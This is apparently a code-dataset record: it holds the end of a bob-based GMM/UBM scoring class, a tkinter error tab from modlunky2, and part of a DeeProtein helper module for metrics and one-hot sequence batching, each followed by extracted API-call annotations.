# Computes input size
input_size = array.shape[1]
# Creates the machines (KMeans and GMM)
logger.debug(" .... Creating machines")
kmeans = bob.learn.em.KMeansMachine(self.gaussians, input_size)
self.ubm = bob.learn.em.GMMMachine(self.gaussians, input_size)
# Trains using the KMeansTrainer
logger.info(" -> Training K-Means")
# Reseting the pseudo random number generator so we can have the same initialization for serial and parallel execution.
self.rng = bob.core.random.mt19937(self.init_seed)
bob.learn.em.train(
self.kmeans_trainer,
kmeans,
array,
self.kmeans_training_iterations,
self.training_threshold,
rng=self.rng,
pool=self.pool,
)
variances, weights = kmeans.get_variances_and_weights_for_each_cluster(array)
means = kmeans.means
# Initializes the GMM
self.ubm.means = means
self.ubm.variances = variances
self.ubm.weights = weights
self.ubm.set_variance_thresholds(self.variance_threshold)
# Trains the GMM
logger.info(" -> Training GMM")
# Reseting the pseudo random number generator so we can have the same initialization for serial and parallel execution.
self.rng = bob.core.random.mt19937(self.init_seed)
bob.learn.em.train(
self.ubm_trainer,
self.ubm,
array,
self.gmm_training_iterations,
self.training_threshold,
rng=self.rng,
pool=self.pool,
)
def save_ubm(self, projector_file):
"""Save projector to file"""
# Saves the UBM to file
logger.debug(" .... Saving model to file '%s'", projector_file)
hdf5 = (
projector_file
if isinstance(projector_file, bob.io.base.HDF5File)
else bob.io.base.HDF5File(projector_file, "w")
)
self.ubm.save(hdf5)
def train_projector(self, train_features, projector_file):
"""Computes the Universal Background Model from the training ("world") data"""
[self._check_feature(feature) for feature in train_features]
logger.info(
" -> Training UBM model with %d training files", len(train_features)
)
# Loads the data into an array
array = numpy.vstack(train_features)
self.train_ubm(array)
self.save_ubm(projector_file)
#######################################################
# GMM training using UBM #
def load_ubm(self, ubm_file):
hdf5file = bob.io.base.HDF5File(ubm_file)
# read UBM
self.ubm = bob.learn.em.GMMMachine(hdf5file)
self.ubm.set_variance_thresholds(self.variance_threshold)
def load_projector(self, projector_file):
"""Reads the UBM model from file"""
# read UBM
self.load_ubm(projector_file)
# prepare MAP_GMM_Trainer
kwargs = (
dict(
mean_var_update_responsibilities_threshold=self.responsibility_threshold
)
if self.responsibility_threshold > 0.0
else dict()
)
self.enroll_trainer = bob.learn.em.MAP_GMMTrainer(
self.ubm,
relevance_factor=self.relevance_factor,
update_means=True,
update_variances=False,
**kwargs
)
self.rng = bob.core.random.mt19937(self.init_seed)
def project_ubm(self, array):
logger.debug(" .... Projecting %d feature vectors" % array.shape[0])
# Accumulates statistics
gmm_stats = bob.learn.em.GMMStats(self.ubm.shape[0], self.ubm.shape[1])
self.ubm.acc_statistics(array, gmm_stats)
# return the resulting statistics
return gmm_stats
def project(self, feature):
"""Computes GMM statistics against a UBM, given an input 2D numpy.ndarray of feature vectors"""
self._check_feature(feature)
return self.project_ubm(feature)
def read_gmm_stats(self, gmm_stats_file):
"""Reads GMM stats from file."""
return bob.learn.em.GMMStats(bob.io.base.HDF5File(gmm_stats_file))
def read_feature(self, feature_file):
"""Read the type of features that we require, namely GMM_Stats"""
return self.read_gmm_stats(feature_file)
def enroll_gmm(self, array):
logger.debug(" .... Enrolling with %d feature vectors", array.shape[0])
gmm = bob.learn.em.GMMMachine(self.ubm)
gmm.set_variance_thresholds(self.variance_threshold)
bob.learn.em.train(
self.enroll_trainer,
gmm,
array,
self.gmm_enroll_iterations,
self.training_threshold,
rng=self.rng,
pool=self.pool,
)
return gmm
def enroll(self, feature_arrays):
"""Enrolls a GMM using MAP adaptation, given a list of 2D numpy.ndarray's of feature vectors"""
[self._check_feature(feature) for feature in feature_arrays]
array = numpy.vstack(feature_arrays)
# Use the array to train a GMM and return it
return self.enroll_gmm(array)
######################################################
# Feature comparison #
def read_model(self, model_file):
"""Reads the model, which is a GMM machine"""
return bob.learn.em.GMMMachine(bob.io.base.HDF5File(model_file))
def score(self, model, probe):
"""Computes the score for the given model and the given probe using the scoring function from the config file"""
assert isinstance(model, bob.learn.em.GMMMachine)
assert isinstance(probe, bob.learn.em.GMMStats)
return self.scoring_function(
[model], self.ubm, [probe], [], frame_length_normalisation=True
)[0][0]
def score_for_multiple_probes(self, model, probes):
"""This function computes the score between the given model and several given probe files."""
assert isinstance(model, bob.learn.em.GMMMachine)
for probe in probes:
assert isinstance(probe, bob.learn.em.GMMStats)
# logger.warn("Please verify that this function is correct")
return self.probe_fusion_function(
self.scoring_function(
[model], self.ubm, probes, [], frame_length_normalisation=True
)
)
class GMMRegular(GMM):
"""Algorithm for computing Universal Background Models and Gaussian Mixture Models of the features"""
def __init__(self, **kwargs):
"""Initializes the local UBM-GMM tool chain with the given file selector object"""
# logger.warn("This class must be checked. Please verify that I didn't do any mistake here. I had to rename 'train_projector' into a 'train_enroller'!")
# initialize the UBMGMM base class
GMM.__init__(self, **kwargs)
# register a different set of functions in the Tool base class
Algorithm.__init__(
self, requires_enroller_training=True, performs_projection=False
)
#######################################################
# UBM training #
def train_enroller(self, train_features, enroller_file):
"""Computes the Universal Background Model from the training ("world") data"""
train_features = [feature for client in train_features for feature in client]
return self.train_projector(train_features, enroller_file)
#######################################################
# GMM training using UBM #
def load_enroller(self, enroller_file):
"""Reads the UBM model from file"""
return self.load_projector(enroller_file)
######################################################
# Feature comparison #
def score(self, model, probe):
"""Computes the score for the given model and the given probe.
The score are Log-Likelihood.
Therefore, the log of the likelihood ratio is obtained by computing the following difference."""
assert isinstance(model, bob.learn.em.GMMMachine)
self._check_feature(probe)
score = sum(
model.log_likelihood(probe[i, :]) - self.ubm.log_likelihood(probe[i, :])
for i in range(probe.shape[0])
)
return score / probe.shape[0]
def score_for_multiple_probes(self, model, probes):
raise NotImplementedError("Implement Me!")
| [
"logging.getLogger",
"bob.bio.base.algorithm.Algorithm.__init__",
"numpy.vstack",
"multiprocessing.pool.ThreadPool"
] | [((261, 293), 'logging.getLogger', 'logging.getLogger', (['"""bob.bio.gmm"""'], {}), "('bob.bio.gmm')\n", (278, 293), False, 'import logging\n'), ((7120, 7148), 'numpy.vstack', 'numpy.vstack', (['train_features'], {}), '(train_features)\n', (7132, 7148), False, 'import numpy\n'), ((9856, 9884), 'numpy.vstack', 'numpy.vstack', (['feature_arrays'], {}), '(feature_arrays)\n', (9868, 9884), False, 'import numpy\n'), ((11800, 11888), 'bob.bio.base.algorithm.Algorithm.__init__', 'Algorithm.__init__', (['self'], {'requires_enroller_training': '(True)', 'performs_projection': '(False)'}), '(self, requires_enroller_training=True,\n performs_projection=False)\n', (11818, 11888), False, 'from bob.bio.base.algorithm import Algorithm\n'), ((4674, 4700), 'multiprocessing.pool.ThreadPool', 'ThreadPool', (['self.n_threads'], {}), '(self.n_threads)\n', (4684, 4700), False, 'from multiprocessing.pool import ThreadPool\n')] |
import logging
from tkinter import ttk
from modlunky2.ui.widgets import Tab
logger = logging.getLogger("modlunky2")
class ErrorTab(Tab):
def __init__(self, tab_control, *args, **kwargs):
super().__init__(tab_control, *args, **kwargs)
self.tab_control = tab_control
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.label = ttk.Label(
self, text="Failed to load this tab... See console for more details."
)
self.label.grid(row=1, column=0, pady=5, padx=5, sticky="nswe")
| [
"logging.getLogger",
"tkinter.ttk.Label"
] | [((88, 118), 'logging.getLogger', 'logging.getLogger', (['"""modlunky2"""'], {}), "('modlunky2')\n", (105, 118), False, 'import logging\n'), ((394, 479), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'text': '"""Failed to load this tab... See console for more details."""'}), "(self, text='Failed to load this tab... See console for more details.'\n )\n", (403, 479), False, 'from tkinter import ttk\n')] |
import matplotlib
matplotlib.use('Agg')
import tensorflow as tf
import numpy as np
import re, os
import random
import math
import json
import tarfile
import matplotlib.pyplot as plt
import sklearn.metrics
from seaborn import barplot, set_style
from sklearn.preprocessing import OneHotEncoder
from collections import OrderedDict
from matplotlib import font_manager
class OptionHandler():
"""This Class holds all the Options from the config.JSON. The Attributes of this class are directly accessed
by DeeProtein, the BatchGenerator, the ROCtracker and the TFrecordsgenerator.
Attributes:
config: A `dict` holding all the global paramters. This is read from config.JSON.
_name: A `str` holding the model name.
_thresholdnum: `int32`, nr of thresholds to use to calculate the ROC/PR metrics.
_gpu: `int32`, which gpu to use in multiGPU context.
_allowsoftplacement: `str` if 'True' the Variables can be moved to CPU.
_numepochs: `int32` the number of epochs to calculate. DEPREACTED. Use numsteps instead.
_numsteps: `int32` the number of steps to run the model.
_embeddingdim: `int32` the dimension of the protein embedding generated by Deeprotein.generate_embedding().
_depth: `int32` the depth the nr of amino acids. Defaults to 20.
_structuredims: `int32` the nr of structural elements to consider in the structure embedding.
_traindata: `str` the path to the traindataset.
_validdata: `str` the path to the validdataset.
_batchesdir: `str` the path to the examples directory.
_inferencemode: `str` if 'True' model is initialized in inference mode.
_labels: `str` the type od labels to use must be one of ['EC' or 'GO']. Until now only 'GO' is fully implemented.
_nclasses: `int32` the number of classes to consider. This number must match the line number in the EC_file.
_classbalancing: `str` if 'True' the classes are weighted for their size/their importance during training.
_maxclassinbalance: `int32` the maximum weight a class can obtain.
_dropoutrate: `float32` the dropout to assign to fully connected layers.
_learningrate: `float32` the learningrate.
_epsilon: `float32` the epsilon parameter of the Adam optimizer.
_batchsize: `int32` the bacthsize to apply in trainig and validation mode.
_batchgenmode: `str` currently only one option is available: 'one_hot_padded'
_windowlength: `int32` the length of the window to apply on a sequence.
_minlength: `int32` the minlength a sequence must have to be included in the dataset.
_numthreads: `int32` the number of threads to use in the inputpipeline.
_restorepath: `int32` the path from which to restore the model.
_restore: `str` if 'True' the model is restored from the path specified in the restorepath.
_debug: `str` if 'True' the model is initialized in the debug mode.
_ec_file: `str` the path to the EC_file, holding all labels and the label sizes.
_summariesdir: `str` the directory where to store the model and to write the summaries.
"""
def __init__(self, config_dict):
self.config = config_dict
self._name = config_dict['model_name']
self._thresholdnum = config_dict['threshold_num']
self._gpu = config_dict['gpu']
self._allowsoftplacement = config_dict['allow_softplacement']
self._numepochs = config_dict['num_epochs']
self._numsteps = config_dict['num_steps']
self._depth = config_dict['depth']
self._structuredims = config_dict['structure_dims']
self._traindata = config_dict['train_data']
self._validdata = config_dict['valid_data']
self._batchesdir = config_dict['batches_dir']
self._inferencemode = True if config_dict['inference_mode'] == 'True' else False
self._labels = config_dict['labels']
self._nclasses = config_dict['n_classes']
self._classbalancing = True if config_dict['class_balancing'] == 'True' else False
self._maxclassinbalance = config_dict['maxclass_inbalance']
self._dropoutrate = config_dict['dropoutrate']
self._learningrate = config_dict['learning_rate']
self._epsilon = config_dict['epsilon']
self._batchsize = config_dict['batch_size']
self._batchgenmode = config_dict['batchgen_mode']
self._windowlength = config_dict['window_length']
self._minlength = config_dict['min_length']
self._numthreads = config_dict['num_threads'] #TODO ASSERT THIS NUMBER!!!!!!!!
self._restorepath = config_dict['restore_path']
self._restore = True if config_dict['restore'] == 'True' else False
self._debug = True if config_dict['debug'] == 'True' else False
self._ecfile = config_dict['EC_file']
self._summariesdir = config_dict['summaries_dir'] # for tensorboard
self._summariesdir = self._summariesdir + \
'_{l}_{n}_{w}_{g}_{b}_{lr}_{e}'.format(g=self._batchgenmode,
w=self._windowlength,
n=self._nclasses,
b=self._batchsize,
lr=self._learningrate,
e=self._epsilon,
l=self._labels)
if not os.path.exists(self._summariesdir):
os.makedirs(self._summariesdir)
if not os.path.exists(self._batchesdir):
os.makedirs(self._batchesdir)
def write_dict(self):
"""Store the config_dict on disc in the save_dir.
"""
with open(os.path.join(self._summariesdir, 'config_dict.JSON'), "w") as config_dict:
json.dump(self.config, config_dict)
class RocTracker():
"""This class calculates comprehensive metrics for the validation of the performace of DeeProtein.
The calculated metrics include Area under the ROC-Curve and AUC under the Precision/recall-curve.
Attributes:
_opts: A `helpers.OptionHandler` defining the global preferences.
metrics_path: `str` the path to the metrics folder.
metrics_file: `str` file to the metrics.csv where the most recent metrics are stored.
roc_score: `Array` holding the logits of the model for each validation batch.
roc_labels: `Array` holding the labels of the model for each validation batch.
pred_positives_sum: `Array` holding the positive predictions for each class.
actual_positives_sum: `Array` holding the condition positives predictions for each class.
true_positives_sum: `Array` holding the true positives predictions for each class.
num_calculations: `int32` as a counter.
"""
def __init__(self, optionhandler):
self._opts = optionhandler
self.metrics_path = os.path.join(self._opts._summariesdir, 'metrics')
if not os.path.exists(self.metrics_path):
os.mkdir(self.metrics_path)
self.metrics_file = open(os.path.join(self.metrics_path, 'metrics.csv'), "w")
self.roc_score = []
self.roc_labels = []
self.pred_positives_sum = np.zeros(self._opts._nclasses)
self.actual_positives_sum = np.zeros(self._opts._nclasses)
self.true_positive_sum = np.zeros(self._opts._nclasses)
self.num_calculations = 0
try:
plt.style.use(json.load(
open('/net/data.isilon/igem/2017/scripts/clonedDeeProtein/DeeProtein/style.json', 'r')))
self.font = font_manager.FontProperties(
fname='/net/data.isilon/igem/2017/data/cache/fonts/JosefinSans-Regular.tff')
self.monospaced = font_manager.FontProperties(
fname='/net/data.isilon/igem/2017/data/cache/fonts/DroidSansMono-Regular.ttf')
except:
pass
def update(self, sigmoid_logits, true_labels):
"""Update the ROC tracker, with the predictions on one batch made during validation.
Args:
sigmoid_logits: `np.Array` and 2D arrray holding the sigmoid logits for the validation batch.
true_labels: `np.Array` and 2D arrray holding the true labels for the validation batch.
"""
# threshold this thing
# we consider a class "predicted" if it's sigmoid activation is higher than 0.5 (predicted labels)
batch_predicted_labels = np.greater(sigmoid_logits, 0.5)
batch_predicted_labels = batch_predicted_labels.astype(float)
batch_pred_pos = np.sum(batch_predicted_labels, axis=0) #sum up along the batch dim, keep the channels
batch_actual_pos = np.sum(true_labels, axis=0) #sum up along the batch dim, keep the channels
# calculate the true positives:
batch_true_pos = np.sum(np.multiply(batch_predicted_labels, true_labels), axis=0)
# and update the counts
self.pred_positives_sum += batch_pred_pos #what the model said
self.actual_positives_sum += batch_actual_pos #what the labels say
self.true_positive_sum += batch_true_pos # where labels and model predictions>0.5 match
assert len(self.true_positive_sum) == self._opts._nclasses
# add the predictions to the roc_score tracker
self.roc_score.append(sigmoid_logits)
self.roc_labels.append(true_labels)
def calc_and_save(self, logfile):
"""Calculate the ROC curve with AUC value for the collected test values (roc_scores, roc_labels).
Writes everything to files, plots curves and resets the Counters afterwards.
Args:
logfile: `file-object` the logfile of the DeeProtein model.
"""
self.metrics_file = open(os.path.join(self.metrics_path, 'metrics.csv'), "w")
self.num_calculations += 1
# concat score and labels along the batchdim -> a giant test batch
self.roc_score = np.concatenate(self.roc_score, axis=0)
self.roc_labels = np.concatenate(self.roc_labels, axis=0)
# get the total number of seqs we tested on:
logfile.write('[*] Calculating metrics\n')
test_set_size = self.roc_labels.shape[0]
# do the calculations
fpr, tpr, thresholds = sklearn.metrics.roc_curve(y_true=np.reshape(self.roc_labels, (-1)),
y_score=np.reshape(self.roc_score, (-1)))
auc = sklearn.metrics.auc(fpr, tpr)
precision_arr, recall_arr, thresholds = sklearn.metrics.precision_recall_curve(
y_true=np.reshape(self.roc_labels, (-1)), probas_pred=np.reshape(self.roc_score, (-1)))
# write get the max, min and avg scores for each class:
# determine the scores for the labels
scores = self.roc_score * self.roc_labels
mean_scores = np.mean(scores, axis=0)
assert mean_scores.shape[0] == self._opts._nclasses
max_scores = np.amax(scores, axis=0)
assert max_scores.shape[0] == self._opts._nclasses
min_scores = np.amin(scores, axis=0)
assert min_scores.shape[0] == self._opts._nclasses
self.metrics_file.write(str(mean_scores) + '\n')
self.metrics_file.write(str(max_scores) + '\n')
self.metrics_file.write(str(min_scores) + '\n')
self.metrics_file.close()
# get printable metrics (for log file):
# where predPositives_sum == 0, tp_sum is also 0
precision_class = self.true_positive_sum / np.maximum(1, self.pred_positives_sum)
# where actualPositives_sum == 0, tp_sum is also 0
recall_class = self.true_positive_sum / np.maximum(1, self.actual_positives_sum)
precision = np.sum(self.true_positive_sum) / np.sum(self.pred_positives_sum)
recall = np.sum(self.true_positive_sum) / np.sum(self.actual_positives_sum)
f1 = 2*precision*recall / (precision + recall)
logfile.write("[*] Tested on %d seqs, "
"precision %.2f%%, "
"recall %.2f%%, "
"F1 %.2f%%\n" % (test_set_size, precision, recall, f1))
logfile.flush()
#plot ROC:
self.plot_simple_curve(x=fpr, y=tpr, title=self._opts._name + '_ROC_curve',
legend=self._opts._name + ' (AUC = %0.4f)' % auc,
xname='False positive rate', yname='True positive rate',
filename=os.path.join(self.metrics_path, self._opts._name +
'.roc_%d' % self.num_calculations))
# PR curve
self.plot_simple_curve(x=recall_arr, y=precision_arr,
title=self._opts._name + ' PR curve', legend=self._opts._name,
xname='Recall', yname='Precision',
filename=os.path.join(self.metrics_path, self._opts._name +
'.precision_%d' % self.num_calculations),
include_linear=False)
# reset the stats-collectors:
self.roc_score = []
self.roc_labels = []
self.pred_positives_sum = np.zeros(self._opts._nclasses)
self.actual_positives_sum = np.zeros(self._opts._nclasses)
logfile.write('[*] Done testing.\n')
def plot_simple_curve(self, x, y, title, legend, xname, yname, filename, include_linear=True, iGEM_style=True):
"""Plots simple curve in the iGEM style if wanted.
Args:
x: `Array1d`, what to plot on the x-Axis.
y: `Array1d` what to plot on the y-Axis.
title: `str`, the title.
legend:`str`, the legend.
xname: `str`, the name of the x axis.
yname: `str`, the name of the y axis.
filename: `str`, path to the file where to save the plot.
include_linear: `bool`, whether to plot a linear line with slope=1.
iGEM_style: `bool`, whether to plot in the iGEM-Heidelberg style layout.
"""
plt.ioff()
fig = plt.figure(1, figsize=(5, 5), dpi=200)
plt.plot(x, y, color='#005493', lw=2, label=legend)
if include_linear:
plt.plot([0, 1], [0, 1], color='#B9B9B9', lw=2, linestyle="--")
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
if iGEM_style:
plt.title(title, fontproperties=self.font)
plt.xlabel(xname, fontproperties=self.font)
plt.ylabel(yname, fontproperties=self.font)
plt.legend(loc="lower right", prop=self.font)
else:
plt.title(title)
plt.xlabel(xname)
plt.ylabel(yname)
plt.legend(loc="lower right")
plt.savefig(filename+".svg")
plt.savefig(filename+".png")
plt.close(fig)
def _count_lines(file_path):
"""Count lines in a file.
A line counter. Counts the lines in given file with counter count counts.
Args:
file_path: `str` path to file where to count the lines.
"""
count = 0
with open(file_path, "r") as fobj:
for line in fobj:
count += 1
return count
class StratifiedCounterDict(dict):
def __missing__(self, key):
self[key] = {'tp': 0,
'pred_p': 0,
}
return self[key]
class BatchGenerator():
"""Batchgenerator of the DeeProtein model.
This Class generates the life batches for inference and holds important information such as the class_dict
and the embedding_dict.
It further can be used to perform tests on a model by generating batches of garbage sequences or batches of
sequences for inference.
Attributes:
_opts: A `helpers.OptionHandler` holding the global options for the module.
mode: A `str`. Has to be one of ['one_hot_padded']
inferencedata: A `fileObject` the file from which to infer.
traindata: A `fileObject` the file from which to train.
validdata: A `fileObject` the file from which to evaluate.
AA_to_id: A `dict` mapping single letter AAs to integers.
id_to_AA: A `dict` the reverse of AA_to_id.
class_dict: An `OrderedDict` mapping `str` labels to integers. The order is kept from the EC_file specifier in
the config_dict.
id_to_class: An `OrderedDict` the reverse class_dict.
embedding_dict: An `OrderedDict` mapping sequence names to the index in the protein embedding.
garbage_percentage: A `float32` defining the amount of Garbage to incorporate in the dataset.
garbage_count: A `int32` used to count the nr of garbage that has been written.
eval_batch_nr: A `int32`, the nr of batches needed for complete evaluation of the valid set.
batches_per_file: A `int32`, defines the nr of batches that is included in a tf.Records file.
epochs: A `int32` defining the nr of epochs to train.
curr_epoch: A `int32` counter for the epcohs.
label_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the labels.
AA_enc: A `sklearn.preprocessing.OneHotEncoder` used to encode the AA letters.
"""
def __init__(self, optionhandler):
self._opts = optionhandler
self.mode = self._opts._batchgenmode # one of ['window', 'bigbox', 'dynamic']
self.traindata = open(self._opts._traindata, 'r')
self.validdata = open(self._opts._validdata, 'r')
self.AA_to_id = {}
self.id_to_AA = {}
self.class_dict = OrderedDict()
self.id_to_class = OrderedDict()
self._get_class_dict()
self.embedding_dict = OrderedDict()
# determine the number of batches for eval from lines in the validdata and the garbagepercentage
self.garbage_percentage = 0.2
self.garbage_count = 0 # a counter for generated garbage sequences
self.eval_batch_nr = int(_count_lines(self._opts._validdata) * (1 + self.garbage_percentage) //
self._opts._batchsize)
print('Initialized Batchgen with batchsize: %d, numeval_batches: %d at'
' garbage_percentage: %f' % (self._opts._batchsize,
self.eval_batch_nr,
self.garbage_percentage))
self.batches_per_file = 10000
self.epochs = 2000
self.curr_epoch = 0
self.label_enc = OneHotEncoder(n_values=self._opts._nclasses, sparse=False)
self.AA_enc = 'where we put the encoder for the AAs'
if self.mode.startswith('one_hot'):
AAs = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L',
'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y',]
self.AA_enc = OneHotEncoder(n_values=self._opts._depth, sparse=False)
if 'physchem' in self.mode: #this is to be implemented.
_hydro = [1.8, 2.5, -3.5, -3.5, 2.8,
-0.4, -3.2, 4.5, -3.9, 3.8,
1.9, -3.5, -1.6, -3.5, -4.5,
-0.8, -0.7, 4.2, -0.9, -1.3]
_molarweight = [89.094, 121.154, 133.104, 147.131, 165.192,
75.067, 155.156, 131.175, 146.189, 131.175,
149.208, 132.119, 115.132, 146.146, 174.203,
105.093, 119.119, 117.148, 204.228, 181.191]
_is_polar = lambda aa: 1 if aa in ['DEHKNQRSTY'] else 0
_is_aromatic = lambda aa: 1 if aa in ['FWY'] else 0
_has_hydroxyl = lambda aa: 1 if aa in ['ST'] else 0 #should we add TYR??
_has_sulfur = lambda aa: 1 if aa in ['CM'] else 0
for i, aa in enumerate(AAs):
self.AA_to_id[aa] = {'id': len(self.AA_to_id),
'hydro': _hydro[i],
'molweight': _molarweight[i],
'pol': _is_polar(aa),
'arom': _is_aromatic(aa),
'sulf': _has_sulfur(aa),
'OH': _has_hydroxyl(aa)}
else:
for aa in AAs:
self.AA_to_id[aa] = len(self.AA_to_id)
# get the inverse:
self.id_to_AA = {}
for aa, id in self.AA_to_id.items():
self.id_to_AA[id] = aa
self.id_to_AA[42] = '_'
def _get_class_dict(self):
"""Generate the class-dict.
The class dict stores the link between the index in the one-hot encoding and the class.
"""
with open(self._opts._ecfile, "r") as ec_fobj:
for line in ec_fobj:
fields = line.strip().split()
if fields[1].endswith('.csv'):
fields[1] = fields[1].rstrip('.csv')
if self._opts._labels == 'EC':
self.class_dict[fields[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
if self._opts._labels == 'GO':
self.class_dict[fields[1].split('_')[1]] = {'id': len(self.class_dict),
'size': int(fields[0]),
}
# get a reverse dict:
for key in self.class_dict.keys():
self.id_to_class[self.class_dict[key]['id']] = key
def _update_embedding_dict(self, name, labels):
"""Helper function for the DeeProtein.generate_embedding().
Update the embedding dict for new entries. This is used on the fly as we perform inference batchgen.
Args:
name: A `str`, name of the new token/protein
labels: A `list` of strings which labels to assign to the new token
"""
if len(self.embedding_dict) == 0:
# add UNK token the first time this method is called
self.embedding_dict['UNK'] = {}
self.embedding_dict['UNK']['labels'] = ['UNK']
self.embedding_dict['UNK']['id'] = 0 # we save 0 for the UNK token
# check if the key (= name) is already in the dict:
if name not in self.embedding_dict:
assert len(self.embedding_dict) > 0
self.embedding_dict[name] = {}
self.embedding_dict[name]['labels'] = labels
self.embedding_dict[name]['id'] = len(self.embedding_dict)
else:
# get a new entry to the dict:
name_matches = [k for k in self.embedding_dict.keys() if k.startswith(name)]
new_name = name + str(len(name_matches))
assert len(self.embedding_dict) > 0
self.embedding_dict[new_name] = {}
self.embedding_dict[new_name]['labels'] = labels
self.embedding_dict[new_name]['id'] = len(self.embedding_dict)
def _csv_EC_decoder(self, in_csv, encoded_labels=True):
"""Helper function for _process_csv().
This function takes an in csv obj and iterates over the lines.
Args:
in_csv: `fileobject`, the incsv file object.
encoded_labels: `bool`, wheter to return one-hot encoded labels or the label as string (optional).
Defaults to True.
Returns:
name: A `str` holding the name of the sample sequence.
seq: A `str` holding the sequence.
seq: A `str` holding the label(s).
"""
assert self.mode == 'one_hot_padded', 'mode must be one_hot_padded'
line = in_csv.readline()
fields = line.strip().split(';')
name = fields[0]
seq = fields[1]
if fields[2].endswith('.csv'): #TODO assert this
fields[2] = fields[2].rstrip('.csv')
if self._opts._labels == 'EC':
EC_str = fields[2] #TODO assert this
if encoded_labels:
EC_CLASS = 0 if self._opts._inferencemode else self.class_dict[EC_str]['id']
label = [[EC_CLASS]] # we need a 2D array
else:
label = EC_str
elif self._opts._labels == 'GO':
GO_str = fields[2] #TODO assert this
GOs = 0 if self._opts._inferencemode else fields[2].split(',') #TODO assert this
if encoded_labels:
label = [[self.class_dict[go]['id']] for go in GOs] # returns a 2D array
else:
label = GOs
return name, seq, label
def _seq2tensor(self, seq):
"""Helper function for _process_csv().
Takes a sequence and encodes it onehot.
Args:
seq: `str`, The sequence to encode
Returns:
padded_seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos.
length: A `Tensor` holding the length.
"""
if self.mode == 'one_hot_padded':
# first check if the sequence fits in the box:
if len(seq) <= self._opts._windowlength:
seq_matrix = np.ndarray(shape=(len(seq)), dtype=np.int32)
# if sequence does not fit we clip it:
else:
seq_matrix = np.ndarray(shape=(self._opts._windowlength), dtype=np.int32)
for i in range(len(seq_matrix)):
seq_matrix[i] = self.AA_to_id[seq[i]]
start_pos = 0 #because our sequence sits at the beginning of the box
length = len(seq_matrix) #true length (1 based)
# now encode the sequence in one-hot
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq_matrix, (1, -1))),
(len(seq_matrix), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
padded_seq_matrix = np.pad(oh_seq_matrix, pad_width=npad, mode='constant', constant_values=0)
padded_seq_matrix = np.transpose(padded_seq_matrix)
del oh_seq_matrix, seq_matrix
return padded_seq_matrix, start_pos, length #true length 1 based
else:
print("Error: MODE must be of 'one_hot_padded'")
def _encode_single_seq(self, seq, desired_label=None):
"""Encode a single sequence one-hot.
This funciton is thought to be used in the inference mode.
Args:
seq: A `str` holding the sequence to be encoded.
desired_label: A `str` holding the label to assign to this sequence (optional).
Returns:
oh_label: A `Tensor` holding the one_hot encoded label. This is only returned if a desired label was passed.
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos. This is only returned if a desired label was passed.
length: A `Tensor` holding the length. This is only returned if a desired label was passed.
"""
seq_matrix, start_pos, length = self._seq2tensor(seq)
# look up the label in the class_dict:
if desired_label:
desired_label_ID = self.class_dict[desired_label]['id']
# encode label one_hot:
oh_label = self.label_enc.fit_transform([[desired_label_ID]]) # of shape [1, n_classes]
return oh_label, seq_matrix, start_pos, length
else:
return seq_matrix
def _process_csv(self, queue, return_name=True, encode_labels=True):
"""Iterate over a dataset.csv and process the samples.
Takes the path to a file and processes the samples a sample at a time whenever the function is called.
Args:
queue: `str` the file_path to the dataset.csv. The csv file should be in the form of:
name,seq,labels.
return_name: `bool` whether to return the sequence name or not. Defaults to True.
encode_labels: `bool` whether to return the encoded labels or the raw str. Defaults to True.
Returns:
Depending on return_name either (if true):
name: A `str` holding the sample name.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
OR
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
seq_matrix: A `Tensor` holding the one-hot encoded sequence.
start_pos: A `Tensor` holding the start pos of the sequence in the window (defaults to 0).
end_pos: A `Tensor` holding the end pos of the sequence in the window.
"""
name, seq, label = self._csv_EC_decoder(queue, encoded_labels=encode_labels)
seq_matrix, start_pos, end_pos = self._seq2tensor(seq)
if return_name:
return name, label, seq_matrix, start_pos, end_pos
else:
return label, seq_matrix, start_pos, end_pos
def generate_garbage_sequence(self, return_name=False):
"""Generate a garbage sequence.
Generates a sequence full of garbage, e.g. a obviously non functional sequence. Used to test the robustness of
the model precision.
Args:
return_name: A `bool`, if True return the garbage sequene along wih a generated name.
Returns:
name: A `str` holding the sample name (if return_name is True).
padded_seq: A `Tensor` holding the one-hot encoded and padded (to windowlength) garbage sequence.
label: A `Tensor` holding the one-hot encoded labels (depending on encode_labels, otherwise raw labels).
The labels of a garbage sequence are a zeros Tensor.
garbage_label: A `Tensor` holding the garbage label (binary, either 1 for garbage or 0 for valid sequence).
"""
modes = ['complete_random', 'pattern', 'same']
mode = modes[random.randint(0, 2)]
self.garbage_count += 1
# get the length of the protein
length = random.randint(175, self._opts._windowlength-10) #enforce padding
if mode == 'pattern':
#print('pattern')
# Generate a repetitive pattern of 5 AminoAcids to generate the prot
# get a random nr of AAs to generate the pattern:
AA_nr = random.randint(2, 5)
# get an index for each AA in AA_nr
idxs = []
for aa in range(AA_nr):
idx_found = False
while not idx_found:
aa_idx = random.randint(0, 19)
if not aa_idx in idxs:
idxs.append(aa_idx)
idx_found = True
reps = math.ceil(length/AA_nr)
seq = reps * idxs
length = len(seq)
elif mode == 'complete_random':
# print('complete_random')
seq = []
for aa in range(length):
# get an idx for every pos in length:
idx = random.randint(0, 19)
seq.append(idx)
elif mode == 'same':
# print('ONE')
AA = random.randint(0, 19)
seq = length * [AA]
label = np.zeros([self._opts._nclasses])
label = np.expand_dims(label, axis=0)
garbage_label = np.asarray([1])
garbage_label = np.expand_dims(garbage_label, axis=0)
oh_seq_matrix = np.reshape(self.AA_enc.fit_transform(np.reshape(seq, (1, -1))), (len(seq), 20))
# pad the sequence to the boxsize:
npad = ((0, self._opts._windowlength-length), (0, 0))
